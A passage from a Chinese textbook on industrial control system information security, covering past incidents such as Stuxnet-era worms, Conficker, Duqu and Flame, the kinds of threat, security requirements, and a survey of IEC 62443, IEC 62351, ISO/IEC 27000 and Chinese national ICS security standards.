火墙,但还是有13个美国汽车厂由于被蠕虫感染而被迫关闭,50000生产线上的工人被迫 停止工作,预计经济损失超过1400000美元。 2010年我国某石化、2011年某炼油厂的某装置控制系统分别感染 Conficker 病毒,都 造成了控制系统服务器与控制器通信不同程度的中断。 2014年,某钢铁厂遭到攻击,攻击者的行为导致工控系统的控制组件和整个生产线被 迫停止运转,造成重大损失。 5. 跨行业 2011 年,微软公司警告称,最新发现的 Duqu 病毒可从工业控制系统制造商那里收集 情报数据。 2012年,发现攻击多个中东国家的恶意程序——Flame 火焰病毒,能收集各行业的敏 感信息。 1.1.2 工业控制系统信息安全威胁 工业控制系统信息安全威胁主要来自敌对因素、偶然因素、系统结构因素和环境因素。 1. 敌对因素 敌对因素可以是来自内部或外部的个体、专门的组织或政府,通常采用包括黑客攻击、 数据操纵、间谍、病毒、蠕虫、特洛伊木马和僵尸网络等进行攻击。 黑客攻击通过攻击自动化系统的要害或弱点,使得工业网络信息的保密性、完整性、 可靠性、可控性、可用性等受到伤害,从而造成不可估量的损失。 来自外部的攻击包括非授权访问,是指一个非授权用户的入侵;拒绝服务 (Denial of Service,DoS) 攻击,即黑客想办法让目标设备停止提供服务或资源访问。这样一来, 一 个设备不能执行它的正常功能,或者它的动作妨碍了其他设备执行正常功能,从而导致系 统瘫痪,停止运行。 近年来,高级持续威胁 (Advanced Persistence Threat,APT) 不断出现。攻击者有一个 基于特定战略的缜密计划,其攻击对象是大中型企业、政府、重要机构。攻击者使用社会上的工程技术和/或招募内部人员来获取有效登录凭证。选择使用何种工具主要取决于他们 的攻击目标是什么,以及其网络配置和安全状况。攻击者经常利用僵尸网络,因为僵尸网 络能够给他们提供更多资源来发动攻击,并且很难追踪到攻击的源头。 2. 偶然因素 偶然因素可以来自内部或外部的专业人员、运行维护人员或管理员。由于技术水平的 局限性及经验不足,这些人员可能会出现各种意想不到的操作失误,势必对系统或信息安 全产生较大影响。 3. 系统结构因素 系统结构因素可以来自系统设备、安装环境和运行软件。由于设备老化、资源不足或 其他情况造成系统设备故障、安装环境失控及软件故障,从而对系统或信息安全产生较大 影响。 4. 环境因素 环境因素可以来自自然或人为灾害、非正常的自然事件(如太阳黑子等)和基础设施 破坏。这些自然灾害、人为灾害、非正常的自然事件和基础设施破坏对工业控制系统信息 安全产生较大影响。 1.1.3 工业控制系统信息安全发展趋势 工业控制系统信息安全发展趋势主要有3个:全行业覆盖趋势、经济越发达安全事件 越多趋势和日益增多趋势。 1. 全行业覆盖趋势 目前,工业控制系统广泛应用于我国电力、冶金、安防、水利、污水处理、石油天然 气、化工、交通运输、制药,以及大型制造等行业中,据不完全统计,超过80%涉及国计 民生的关键基础设施是依靠工业控制系统来实现自动化作业的,工业控制系统已是国家安 全战略的重要组成部分。因此,工业控制系统信息安全有全行业覆盖的趋势。 2. 经济越发达安全事件越多趋势 国家经济越发达,工业控制系统应用越广泛;国家经济越发达,工业管理要求越高, 工厂信息化建设越多。因此,工业控制系统信息安全有国家经济越发达工业控制系统安全 事件就越多的趋势。 3. 日益增多趋势 新技术新应用层出不穷,云计算、移动互联网、大数据、卫星互联网等领域的新技术新应用带来了新的信息安全问题。因此,工业控制系统信息安全有日益增多的趋势。 1.2 工业控制系统信息安全的定义 工业领域的安全通常可分为功能安全、物理安全和信息安全三类。 功能安全是指为了实现设备和工厂安全功能,受保护的安全相关部分和控制设备的安 全相关部分必须正确执行其功能。当失效或故障发生时,设备或系统必须仍能保持安全条 件或进入安全状态。 物理安全是指减小由电击、着火、辐射、机械危险、化学危险等因素造成的危害。 信息安全的范围较广,大到国家军事政治等机密安全,小到防范企业机密的泄露、个 人信息的泄露等。在ISO/IEC 27002中,信息安全的定义是“保持信息的保密性、完整性、 可用性,也可包括真实性、可核查性、不可否认性和可靠性等”。 1.2.1 IEC 对工业控制系统信息安全的定义 工业控制系统信息安全是工业领域信息安全的一个分支,是最近几年发展起来的一个 热点名词。事实上,工业控制系统信息安全早就存在,只是当时人们并没有意识到。 工业控制系统信息安全与通用信息技术 (IT) 安全有一定的区别,有一定的共性,也 有一定的交集,取决于工业控制系统的架构。 在IEC 62443 中对工业控制系统信息安全的定义:①保护系统所采取的措施;②由建 立和维护保护系统的措施所得到的系统状态;③能够免于对系统资源的非授权访问和非授 权或意外的变更、破坏或损失;④基于计算机系统的能力,能够保证非授权人员和系统既 无法修改软件及其数据又无法访问系统功能,却可以保证授权人员和系统不被阻止;⑤防 止对工业控制系统的非法或有害入侵,或者干扰其正确计划的操作。 1.2.2 工业控制系统信息安全的需求 工业控制系统信息安全是针对工业控制系统的信息保护而言的,其信息安全的3个基 本需求如下。 1. 可用性 工业控制系统信息安全必须确保所有控制系统部件可用。 工业控制系统的过程是连续的,工业控制系统不能接受意外中断。如果需要人为中断, 必须提前计划和安排。具体实施前的测试是必需的,以确保工业控制系统的高可用性。除 了意外中断,为了保证生产连续,许多控制系统不允许随便停止和启动。在某些情况下, 生产的产品或使用的设备比信息的中断更重要。因此,采用典型的IT 策略,如重新启动一个组件,通常在工业控制系统中是不能被接受的,因为会对系统的可用性、可靠性和可维 护性产生不利影响。有些工业控制系统采用冗余组件,并行运行,在主组件出问题时可以 切换到备份组件。 2. 完 整 性 工业控制系统信息安全必须确保所有控制系统信息的完整性和一致性。工业控制系统 信息的完整性和一致性分为如下两个方面: (1)数据完整性,即未被未授权篡改或损坏。 (2)系统一致性,即系统未被非法操纵,按既定的目标运行。 3. 保密性 工业控制系统信息安全必须确保所有控制系统的信息安全,配置必要的授权访问,防 止工业信息盗取事件的发生。 除上面介绍的3个基本需求外,工业控制系统信息安全还有其他方面的需求,这些需 求将在第2章介绍。 1.2.3 工业控制系统信息安全与信息技术系统安全的比较 与工业控制系统信息安全相比较,信息技术系统安全也有上面提到的3个需求。两者 对这些需求的优先级是有区别的,其区别如图1-2所示。 工业控制系统信息安全 信息技术系统安全 图1-2 工业控制系统信息安全与信息技术系统安全的比较图 1.3 工业控制系统信息安全的要求和 标准体系 目前,工业控制系统信息安全已引起国际社会的广泛关注,成立了专门工作组,相互 协作,共同应对工业控制系统信息安全问题,对工业控制系统信息安全提出要求,建立相 关国际标准。 我国也正在抓紧制定工业控制系统关键设备信息安全规范和技术标准 , 明确设备安全技术要求。 1.3.1 国家部委、行业的通知 2011 年 9 月,工业和信息化部发布《关于加强工业控制系统信息安全管理的通知》 ((2011)451号),明确了工业控制系统信息安全管理的组织领导、技术保障、规章制度等 方面的要求,并对工业控制系统的连接、组网、配置、设备选择与升级、数据、应急管理 6个方面提出了明确的要求。明确指出:“全国信息安全标准化技术委员会抓紧制定工业控 制系统关键设备信息安全规范和技术标准,明确设备安全技术要求。” 2012年6月28日,在国务院《关于大力推进信息化发展和切实保障信息安全的若干 意见》(国发(2012)23 号)中明确要求:保障工业控制系统安全。加强核设施、航空航 天、先进制造、石油石化、油气管网、电力系统、交通运输、水利枢纽、城市设施等重要 领域工业控制系统,以及物联网应用、数字城市建设中的安全防护和管理,定期开展安全 检查和风险评估。重点对可能危及生命和公共财产安全的工业控制系统加强监管。对重点 领域使用的关键产品开展安全测评,实行安全风险和漏洞通报制度。 2013年8月12日,在国家发改委《关于组织实施2013年国家信息安全专项有关事项 的通知》中,工控安全成为四大安全专项之一,国家在政策层面给予工控安全大力支持。 电力行业已陆续发布《电力二次系统安全防护规定》、《电力二次系统安全防护总体要 求》等一系列文件。 2016年10月17日,工业和信息化部发布《工业控制系统信息安全防护指南》,明确 指出:工业控制系统应用企业应从安全软件选择与管理、配置和补丁管理、边界安全防护、 物理和环境安全防护、身份认证、远程访问安全、安全监测和应急预案演练、资产安全、 数据安全、供应链管理、落实责任11个方面做好工业控制安全防护工作。 2016年11 月7日,第十二届全国人大常委会第二十四次会议表决通过了《中华人民 共和国网络安全法》,并于2017年6月1日起实行。该网络安全法共有七章79条,内容十 分丰富,大概归纳总结了六方面突出亮点:明确了网络空间主权的原则;明确了网络产品 和服务提供者的安全义务;明确了网络运营者的安全义务;进一步完善了个人信息保护规 则;建立了关键信息基础设施安全保护制度;确立了关键信息基础设施重要数据跨境传输 的规则。 2017年5月31日,工业和信息化部印发《工业控制系统信息安全事件应急管理工作 指南》的通知,对工业控制安全风险监测、信息报送与通报、应急处置、敏感时期应急管 理等工作提出了一系列管理要求,明确了责任分工、工作流程和保障措施。 2017年7月31日,工业和信息化部印发《工业控制系统信息安全防护能力评估工作 管理办法》的通知,明确了评估管理组织、评估机构和人员要求,评估工具要求,评估工 作程序,监督管理和工业控制系统信息安全防护能力评估方法。 1.3.2 国际标准体系 1.IEC/ISA 1)IEC 62443《工业过程测量、控制和自动化网络与系统信息安全》 IEC 62443一共分为4个系列共14个标准,第一系列是通用标准,第二系列是策略和 规程,第三系列提出系统级的措施,第四系列提出组件级的措施。14个标准中的8个标准 已完成,其他6个标准在投票或制定过程中,其详细架构如图1-3 所示。各系列的各个标 准简要介绍如下: IEC 62443-1 是第一系列,描述了信息安全的通用方面,是IEC 62443 其他系列的基础。 IEC 62443-1-1 是术语、概念和模型,主要介绍安全目标、深度防御、安全上下文、威 胁风险评估、安全程序成熟度、安全等级生命周期、参考模型、资产模型、区域和管道模 型,以及模型之间的关系,还包括7个基本要求 (FR) 的安全保障等级 (SAL)。 IEC 62443-1-2 是主要的术语和缩略语,包含该系列标准中用到的全部术语和缩略语 列表。 IEC 62443-1-3 是系统信息安全符合性度量,包含建立定量系统信息安全符合性度量体 系所必要的要求,提供系统目标、系统设计和最终达到的信息安全保障等级。 IEC 62443-1-4 是系统信息安全生命周期和使用案例。 IEC 62443-2 是第二系列,主要针对用户的信息安全程序,包括整个信息安全系统的管 理、人员和程序设计方面,是用户在建立其信息安全程序时需要考虑的。 IEC 62443-2-1 是创建工业控制系统安全规程,描述了建立网络信息安全管理系统所要 求的元素和工作流程,以及针对如何实现各元素要求的指南。 IEC 62443-2-2 是运行工业控制系统安全规程,描述了在项目已设计完成并实施后如何 运行安全规程,包括测量项目有效性度量体系的定义和应用。 IEC 62443-2-3 是工业控制系统环境补丁管理。 IEC 62443-2-4 是工业控制系统解决方案供应商要求。 IEC 62443-2-5 是工业控制系统资产用户实施指南。 IEC 62443-3 是第三系列,包括针对系统集成商保护系统所需的技术性信息安全要求, 主要是系统集成商在把系统组装到一起时需要处理的内容,具体包括将整体工业控制系统 设计分配到各个区域和通道的方法,以及信息安全保障等级的定义和要求。 IEC 62443-3-1 是工业控制系统安全技术,提供了对当前不同网络信息安全工具的评估 和缓解措施,可有效地应用于基于现代电子的控制系统,以及用来调节和监控众多产业和 关键基础设施的技术。 IEC62443-3-2 是安全风险评估和系统设计,描述了定义所考虑系统的区域和通道要求, 用于工业控制系统的目标信息安全保障等级要求,并为验证这些要求提供信息性的导则。 IEC 62443-3-3 是系统安全要求和安全保障等,描述了与IEC 62443-1-1定义的7个基 本要求相关的系统信息安全要求,以及如何分配系统信息安全保障等。 IEC 62443-4 是第四系列,是针对制造商提供的单个部件的技术性信息安全要求,包括系统的硬件、软件和信息部分,以及当开发或获取这些类型的部件时需要考虑的特定技术 性信息安全要求。 IEC 62443-4-1 是产品开发要求,定义了产品开发的特定信息安全要求。 IEC 62443-4-2 是工业控制系统组件技术安全要求,描述了对嵌入式设备、主机设备、 网络设备等产品的技术要求。 IEC 62443 涵盖了所有的利益相关方,即资产所有者、系统集成商、组件供应商,以尽 可能地实现全方位的安全防护。为了避免标准冲突, IEC 62443 同时涵盖了业内相关国际 标准的内容,例如,来自荷兰石油天然气组织的 WIB 标准和美国电力可靠性保护协会的 NERC-CIP 标准,它们包含的附加要求也被整合在 IEC 62443 系列标准中。因此,该标准 是工业控制系统信息安全通用且全面的标准。该标准的建立和实施是工业控制系统信息安 全的里程碑,将对工业控制系统信息安全产生深远的影响。 图1-3 IEC 62443/ISA-99 架 构 图 2)IEC 62351《电力系统管理与相关信息交互数据和通信信息安全》 IEC 62351是IEC 第57技术委员会WG15工作组为电力系统安全运行针对有关通信协 议 (IEC 60870-5、IEC 60870-6、IEC 61850、IEC 61970、IEC 61968系列和 DNP 3) 而开 发的数据和通信安全标准。IEC 62351 标准的全名为电力系统管理及关联的信息交换-数据 和通信安全性 (Power Systems Management and Associated Information Exchange -Data and Communications Security), 它由8个部分组成,现对该标准各部分做简要介绍: (1)IEC 62351-1 是介绍部分,包括电力系统运行安全的背景,以及IEC62351 安全 性系列标准的导言信息。 (2)IEC 62351-2 是术语部分,包括IEC62351 标准中使用的术语和缩写语的定义。这 些定义将建立在尽可能多的现有安全性和通信行业标准定义上,所给出的安全性术语广泛 应用于其他行业及电力系统中。 (3)IEC 62351-3 是 TCP/IP 平台的安全性规范部分,提供任何包括TCP/IP 协议平台的 安 全 性 规 范 , 包 括 IEC 60870-6 TASE.2 、基 于 TCP/IPACSI 的 IEC 61850 ACSI 和 IEC60870-5-104,其指定了通常在互联网上包括验证、保密性和完整性安全配合的传输层安全性 (TLS) 的使用。该部分介绍了在电力系统运行中有可能使用的TLS 参数和整定值。 (4)IEC 62351-4 是MMS 平台的安全性部分,提供了包括制造报文规范(MMS)(9506 标准)平台的安全性,包括 TASE.2(ICCP) 和 IEC 61850。它主要与 TLS一起配置和利用 其安全措施,特别是身份认证,它也允许同时使用安全和不安全的通信,所以在同一时间 并不是所有的系统都需要使用安全措施升级。 (5)IEC 62351-5 是 IEC 60870-5 及其衍生规约的安全性部分,对该系列版本的规约(主 要是IEC 60870-5-101, 以及部分102和103)和网络版本 (IEC 60870-5-104 和 DNP 3.0) 提供不同的解决办法。具体来说,运行在TCP/IP 上的网络版本,可以利用在 IEC 62351-3 中描述的安全措施,其中包括由TLS 加密提供的保密性和完整性。因此,唯一的额外要求 是身份认证。串行版本通常仅能与支持低比特率通信媒介,或与受到计算约束的现场设备 一起使用。因此, TLS 在这些环境使用的计算和/或通信会过于紧张。因此,提供给串行版 本的唯一安全措施,包括地址欺骗、重放、修改和一些拒绝服务攻击的认证机制,但不尝 试解决窃听、流量分析或需要加密的拒绝。这些基于加密的安全性措施,可以通过其他方 法来提供,如虚拟专用网 (VPN) 或“撞点上线”技术,依赖于采用的通信和有关设备的 能力。 (6)IEC 62351-6是 IEC 61850对等通信平台的安全性部分,IEC 61850包含变电站LAN 的对等通信多播数据包的3个协议,它们是不可路由的。所需要的信息传送要在4ms 内完 成,采用影响传输速率的加密或其他安全措施是不能被接受的。因此,身份认证是唯一的 安全措施, IEC 62351-6这类报文的数字签名提供了一种涉及最少计算要求的机制。 (7)IEC62351-7 是用于网络和系统管理的管理信息库部分,这部分标准规定了指定用 于电力行业通过以SNMP 为基础处理网络和系统管理的管理信息库(MIB)。 它支持通信网 络的完整性、系统和应用的健全性、入侵检测系统 (IDS), 以及电力系统运行所特别要求 的其他安全性/网络管理要求。 (8)IEC62351-8 是基于角色的访问控制部分,这1部分提供了电力系统中访问控制的 技术规范。通过本规范支持的电力系统环境是企业范围内的部分,以及超出传统边界的部 分,包括外部供应商、供应商和其他能源合作伙伴。本规范精确地解释了基于角色的访问 控制 (RBAC) 在电力系统中企业范围内的使用。它支持分布式或面向服务的架构,这里 的安全性是分布式服务的,而应用来自分布式服务的消费者。 IEC 62351 中所采用的主要安全机制包括数据加密技术、数字签名技术、信息摘要技术 等,其常用的标准有先进的加密标准(AES) 、数据加密标准(DES) 、数字签名算法(DSA)、 RSA 公钥密码、MD5 信息摘要算法、D-H 密钥交换算法、SHA-1 哈希散列算法等。当有 新的更加安全、可靠的算法出现时,也可以引入IEC62351 标准中。 该标准的建立和实施对电力系统数据和通信信息安全产生了深远的影响。 3)IEC 62278《轨道交通可靠性、可用性、可维修性和安全性规范及示例》 本标准定义了RAMS 各要素(可靠性、可用性、可维修性和安全性)及其相互作用, 规定了一个以系统生命周期及其工作为基础、用于管理 RAMS 的流程,使 RAMS 各个要 素间的矛盾得以有效地控制和管理。 本标准不规定轨道交通特定应用中的RAMS 指标、量值、需求或解决方案,不指定保证系统安全的需求。这些应在各类特定应用的RAMS 子标准中规定。 2.ISO/IEC ISO/IEC 27000《信息安全管理系统》包含了信息安保标准,由国际标准化组织 (ISO) 和国际电工委员会 (IEC) 共同颁布。 下面是 ISO/IEC 的安保系列标准,可以用于实施安保蓝图中的项目: ISO/IEC 27000—— 信息安保管理系统-概述和词汇。 ISO/IEC 27001——信息安保管理系统-要求。 ISO/IEC 27002——用于信息安保管理实践的规则。 ISO/IEC 27003——信息安保管理系统实施指南。 ISO/IEC 27004——信息安保管理-测量。 ISO/IEC 27005——信息安保危险管理。 ISO/IEC 27006——对信息安保管理系统提供审计和认证机构的要求。 ISO/IEC 27011——基于ISO/IEC 27002 电信组织的信息安保管理指南。 ISO/IEC 27033《信息技术安全技术网络安全》系列技术规范专注于网络信息安全 方面,对网络信息安全的设计、实施、管理和运营提供指导。该系列技术规范路线图如 图1-4所示,各部分标准分别如下: ISO/IEC 27033-1——信 息 技 术 . 安 全 技 术 网 络 安 全 第 1 部 分 概 述 和 概 念 。 ISO/IEC 27033-2——信 息 技 术 . 安 全 技 术 网 络 安 全 第 2 部 分 网 络 安 全 设 计 和 实 施 指 南 。 ISO/IEC 27033-3——信 息 技 术 . 安 全 技 术 网 络 安 全 第 3 部 分 参 考 网 络 场 景 - 威 胁 、 设 计技术和控制问题。 ISO/IEC 27033-4——信息技术.安全技术网络安全第4部分使用安全网关保护网络 之间通信。 ISO/IEC 27033-5——信息技术.安全技术网络安全第5部分使用虚拟专用网络保护 跨网络通信。 ISO/IEC 27033-6——信 息 技 术 . 安 全 技 术 网 络 安 全 第 6 部 分 无 线 IP 网 络 接 入 保 护 。 1.3.3 国内标准体系 我国工业控制系统信息安全标准体系正在建立过程中,分为国家标准和行业标准,有 些已经发布,有些正在制定、审批或计划过程中,敬请关注。 这些标准的建立,对我国工业控制系统信息安全具有极其重要的指导和规范作用,将 大力推动我国工业控制系统信息安全建设。 目前,已发布与工业控制系统信息安全有关的标准介绍如下,具体内容请查阅相关 标准。 1. 全国工业过程测量和控制标准化技术委员会 1)GB/T 30976.1—2014《工控系统信息安全第1部分:评估规范》 该规范规定了工业控制系统 (SCADA 、DCS 、PLC 、PCS 等)信息安全评估的目标、 评估的内容、实施过程等。 该规范适用于系统设计方、设备生产商、系统集成商、工程公司、用户、资产所有人, 以及评估认证机构等对工业控制系统的信息安全进行评估时使用。 该规范包括术语、定义和缩略语,工业控制系统信息安全概述,组织机构管理评估, 系统能力(技术)评估,评估程序,工业控制系统生命周期各阶段的风险评估,以及评估 报告的格式要求等内容。 该规范于2015年2月1日起正式实施。 2)GB/T30976.2—2014《 工控系统信息安全第2部分:验收规范》 该规范规定了对实施安全解决方案的工业控制系统信息安全能力进行验收的流程、测 试内容、方法及应达到的要求。这些测试是为了证明工业控制系统在增加安全解决方案后 满足对安全性的要求,并且保证其主要性能指标在允许范围内。 该规范的各项内容可作为实际工作中的指导,适用于各种工艺装置、工厂和控制系统。 该规范包括术语和定义、概述、验收准备阶段、风险分析与处置阶段,以及能力确认 阶段等内容。 该规范于2015年2月1日起正式实施。 3)GB/T33007—2016《 工业通信网络网络和系统安全建立工业自动化和控制系统安 全程序》 该规范规定了如何在工业自动化和控制系统 (IACS) 中建立网络信息安全管理系统, 并提供了如何开发这些元素的指南。 该规范于2017年5月1日起正式实施。 4)GB/T33008.1—20 16《工业自动化和控制系统网络安全可编程序控制器 (PLC)》 该规范规定了可编程序控制器 (PLC) 系统的信息安全要求,包括 PLC 直接或间接与 其他系统通信的信息安全要求。 该规范于2017年5月1日起正式实施。 5)GB/ T33009.1—2016《工业自动化和控制系统网络安全集散控制系统(DCS)1部分:防护要求》 该规范规定了集散控制系统在维护过程中应具备的安全能力、防护技术要求和安全防 护区的划分,并对监控层、现场控制层和现场设备层的防护要点、防护设备及防护技术提 出了具体的要求。 该规范于2017年5月1日起正式实施。 6)GB/T33009.2—2016《 工业自动化和控制系统网络安全集散控制系统(DCS) 第 2部分:管理要求》 该规范规定了集散控制系统信息安全管理体系及其相关安全管理要素的具体要求。 该规范于2017年5月1日起正式实施。 7)GB/T33009.3—2016《 工业自动化和控制系统网络安全集散控制系统(DCS) 第 3部分:评估指南》 该规范规定了集散控制系统的安全风险评估等级划分、评估的对象及实施流程,以及 安全措施有效性测试。 该规范于2017年5月1日起正式实施。 8)GB/T33009.4—2016《 工业自动化和控制系统网络安全集散控制系统 (DCS) 第 4部分:风险与脆弱性检测要求》 该规范规定了集散控制系统在投运前、后的风险和脆弱性检测,对 DCS 软件、以太网 网络通信协议与工业控制网络协议的风险和脆弱性检测提出具体要求。 该规范于2017年5月1日起正式实施。 2. 全国信息安全标准化技术委员会 1)GB/T32919—2016《 信息安全技术工业控制系统安全控制应用指南》 该规范包括前言与引言、范围、规范性引用文件、术语和定义、缩略语、安全控制概 述、基线及其设计、选择与规约、选择过程应用、工业控制系统面临的安全风险、工业控 制系统安全控制列表、工业控制系统安全控制基线等部分,可指导工业控制系统建设、运 行、使用、管理等相关方开展工业控制系统安全的规划和落地,也可供进行工业控制系统 安全测评与检查工作时参考。 该规范于2017年3月1日起正式实施。 2)GB/T36323—2018《 信息安全技术工业控制系统安全管理基本要求》 本标准规定了工业控制系统安全管理基本框架及该框架包含的各关键活动,并提出为 实现该安全管理基本框架所需的工业控制系统安全管理基本控制措施,在此基础上,给出 了各级工业控制系统安全管理基本控制措施对应表,用于对各级工业控制系统安全管理提 出安全管理基本控制要求。 本标准适用于工业控制系统建设、运行、使用、管理等相关方进行工业控制系统安全 管理的规划和落实,也可供进行工业控制系统安全测评与检查工作时参考。 该规范于2019年1月1日起正式实施。 3)GB/T 36324—2018《信息安全技术工业控制系统信息安全分级规范》 该规范规定了以工业控制系统风险影响为基准的工业控制系统信息安全等级划分规则 和定级方法,提出了等级模型和定级要素,明确了各个等级工业控制系统所具备的潜在风 险影响、信息安全威胁、信息安全能力和信息安全管理方面的特征。本标准适用于工业自 动化生产企业及相关行政管理部门,为工业控制系统信息安全等级的划分提供指导,为工 业控制系统信息安全的规划、设计、实现、运维及评估和管理提供依据。 该规范于2019年1月1日起正式实施。 4)GB/T36466—2018《 信息安全技术工业控制系统风险评估实施指南》 本标准对工业控制系统安全的定义、目标、原则和工业控制系统资产面临的风险进 行了描述,同时规定了对工业控制系统安全进行风险评估的要素及要素间的关系、实施 过程、工作形式、遵循原则、实施方法,在工业控制系统生命周期不同阶段的不同要求 及实施要点。 本标准适用于指导第三方检测评估机构在工业控制系统现场的风险评估实施工作,也 可供工业控制系统业主单位进行自评估时参考。 该规范于2019年1月1日起正式实施。 5)GB/T36470—2018《 信息安全技术工业控制系统现场测控设备通用安全功能要求》 本标准规定了工业控制系统现场测控设备的通用安全功能要求。 本标准适用于指导设备的安全设计、开发、测试与评估。 该规范于2019年1月1 日起正式实施。 3. 全国电力系统管理及其信息交换标准化技术委员会 1)GB/Z25320.1—2010《 电力系统管理及其信息交换数据和通信安全第1部分:通 信网络和系统安全安全问题介绍》 本部分包括电力系统控制运行的信息安全,主要目的是“为IECTC57 制定的通信协议 的安全,特别是 IEC 60870-5、IEC 60870-6、IEC61850、IEC61970和 IEC61968 的安全, 承担标准的制定;承担有关端对端安全的标准和技术报告的制定”。 2)GB/Z25320.2—2013《 电力系统管理及其信息交换数据和通信安全第2部分:术 语》 本部分包括了在 GB/Z25320 中所使用的关键术语,然而并不意味着这是一个由它定义 的术语列表。用于计算机安全的大多数术语已由其他标准组织正式定义,在这里只是通过 对原始定义术语出处进行引用。 3)GB/Z25320.3—2010《 电力系统管理及其信息交换数据和通信安全第3部分:通 信网络和系统安全包括 TCP/IP 的协议集》 本部分规定如何为 SCADA 和用TCP/IP 作为信息传输层的远动协议,提供机密性、篡 改检测和信息层面认证。 虽然对TCP/IP 的安全防护存在许多可能的解决方案,但本部分的特定范围是在端通信实体内TCP/IP 连接的任一端处,提供通信实体之间的安全。对插入其间的外接安全装置(如 “链路端加密盒”)的使用和规范不在本部分范围内。 4)GB/Z25320.4—2010《 电力系统管理及其信息交换数据和通信安全第4部分:包 含 MMS 的协议集》 为了对基于GB/T16720(ISO 9506)制造业报文规范(Manufacturing Message Specification, MMS) 的应用进行安全防护,本部分规定了过程、协议扩充和算法。其他IEC TC57 标准 如需要以安全的方式使用 MMS, 则可以引用本部分作为其规范性引用文件。 本部分描述了在使用GB/T16720(ISO/IEC 9508) 制造业报文规范时应实现的一些强 制的和可选的安全规范。 为了保护使用 MMS 传递的信息,本部分包含一组由这些引用标准所使用的规范,其 建议是基于为传送 MMS 信息所使用的特定通信协议集的协议。 5)GB/Z 25320.5—2013《电力系统管理及其信息交换数据和通信安全第5部分: GB/T18657 及其衍生标准的安全》 为了对基于或衍生于 IEC 60870-5(GB/T 18657《远动设备及系统-第5部分:传输规 约》)的所有协议的运行进行安全防护,本部分规定了所用的信息、过程和算法。 根据IEC 第57委员会第3工作组的指令,IEC 62351 的本部分仅关注应用层认证和由 此认证所产生的安全防护问题。安全防护涉及的其他问题,特别是通过加密的使用来防止 窃听和中间人攻击,被认为超出本部分范围。通过本部分和其他规范一起使用,可以增加 加密功能。 6)GB/Z2 5320.6—2011《电力系统管理及其信息交换数据和通信安全第6部分: IEC61850 的安全》 为了对基于或派生于 IEC61850 的所有协议的运行进行安全防护,本文件规定了相应的 信息、过程与算法。 4. 全国电力监管标准化技术委员会 GB/T 36047—2018《电力信息系统安全检查规范》 该规范包括前言与引言、范围、规范性引用文件、术语和定义、检查工作流程、检查 内容和检查方法等部分,适用于行业网络与信息安全主管部门开展电力信息系统安全的检 查工作和电力企业在本集团(系统)范围内开展相关信息系统安全的自查工作。 该规范于2018年10月1日起正式实施。 5. 全国核电行业管理及其信息交换标准化技术委员会 1)GB/T 13284.1—2008《核电厂安全系统第1部分设计准则》 GB/T13284.1—2008 是为代替旧版本的 GB/T13284—1998 而制定的国家标准,该标准 提供了有关核电厂安全设计应遵循的准则。标准中规定了核电厂安全系统动力源、仪表和 控制部分最低限度的功能和设计要求,适用于为防止或减轻设计基准事件后果、保护公众 健康和安全所需要的系统,同样适用于保护整个核电厂安全所需的所有与安全有关的系统、构筑物及设备。标准主要引用了GB/T 及 EJ/T 系列标准和准则,主要从安全系统的设计准 则、检测指令设备的功能和要求、执行装置的功能和设计要求及对动力源的要求几个方面 对核工厂安全系统设计进行了较为详细的规范。 2)GB/T 13629—2008《核电厂安全系统中数字计算机的适用准则》 GB/T 13629—2008 准则是2008年7月2日发布的,主要针对核电厂安全系统中数字 计算机适用性制定的,用于代替原有 GB/T13629—1998《 核电厂安全系统中数字计算机的 适用准则》。该准则主要参考 IEEE Std 7-4.3.2—2003《核电厂安全系统中数字计算机的适用 准则》进行修改,将其中的美国标准改为相应的中国标准,规定了计算机用作核电厂安全系 统设备时的一般原则,规范主要引用了GB/T 、EJ/T 、HAF 及IEEE 的相关标准。 6. 行业标准和导则 1)JB/T11960—2014 《工业过程测量和控制安全网络和系统安全》(IEC/TR62443-3: 2008) 本标准建立了在工厂生命周期中的运行阶段来保障工业过程测量和控制系统的信息和 通信技术方面的框架,包括其网络及这些网络中的设备。本标准提供了对工厂运行的安全 要求指南,主要用于自动化系统所有者/操作者(负责ICS 运行)。 此外,本标准的运行要求可能会引起ICS 相关方的兴趣,如自动化系统设计者,设备、 子系统和系统的制造商(供应商),子系统和系统的集成商。 本标准考虑以下几点: (1)适当地移植或改进现有系统。 (2)使用现有的COTS 技术和产品来满足安全目标。 (3)保证安全通信服务的可靠性/可用性;对于各种规模和风险系统的适用性(可扩展 性)。 (4)兼顾功能安全、法律法规及符合信息安全要求的自动化功能要求。 2)JB/T11 961—2014《 工业通信网络 网络和系统安全术语、概念和模型》(IEC/ TS62443-1-1:2009) 本标准是技术规范,定义了用于工业自动化和控制系统 (IACS) 信息安全的术语、概 念和模型,是系列标准中其他标准的基础。为了全面、清晰地表达本标准的系统和组件, 可以从以下几个方面定义和理解覆盖的范围: (1)所含功能性的范围。 (2)特定的系统和接口。 (3)选择所含活动的准则。 (4)选择所含资产的准则。 3)JB/T 11962—2014 《工业通信网络 网络和系统安全工业自动化和控制系统信息 安全技术》(IEC/TR62443-3-1:2009) 本标准提供了对不同网络信息安全工具、缓解对抗措施和技术的评估,可有效地用在 基于现代电子的 IACS 中,以调整和监视数量众多的工业关键基础设施。本标准描述了若干不同种类的控制系统网络信息安全技术、这些种类中可用的产品类别、在 IACS 环境中 使用这些产品的正面和反面理由,相对于预期的威胁和已知的网络脆弱性,更重要的是, 对于使用这些网络信息安全技术产品和/或对抗措施的初步建议和指南。 在本标准中所用到的 IACS 网络信息安全的概念是,最大可能地在所有工业关键基础 设施中包含所有类型的部件、工厂、设施和系统。IACS 包括但不限于硬件(如历史数据服 务器)和软件系统(如操作平台、配置、应用),如分布式控制系统(DCS) 、 可编程序控 制器 (PLC) 、 数据采集与监控 (SCADA) 系统、网络化电子传感系统,以及监视、诊断 和评估系统,包含在此硬件和软件范围内的是必要的工业网络,以及任何相连的或相关的 信息技术 (IT) 设备和对成功运行整个控制系统关键的链路。就这点而言,此范围也包括 但不限于防火墙、服务器、路由器、交换机、网关、现场总线系统、入侵检测系统、智能 电子/终端设备、远程终端单元 (RTU), 以及有线和无线远程调制解调器。用于连续的、 批处理的、分散的或组合过程的相关内部人员、网络或机器接口,用来提供控制、数据记 录、诊断、(功能)安全、监视、维护、质量保证、法规符合性、审计和其他类型的操作功 能。类似的,网络信息安全技术和对抗措施的概念也广泛用于本标准,并包括但不限于如 下技术:鉴别和授权,过滤、阻塞和访问控制,加密,数据确认,审计,措施,监视和检 测工具,操作系统。此外,非网络信息安全技术,即物理信息安全控制,对于网络信息安 全的某些方面来说也是一个基本要求,并在本标准中进行了讨论。 本标准的目的是分类和定义网络信息安全技术、对抗措施和目前可用的工具,为后续 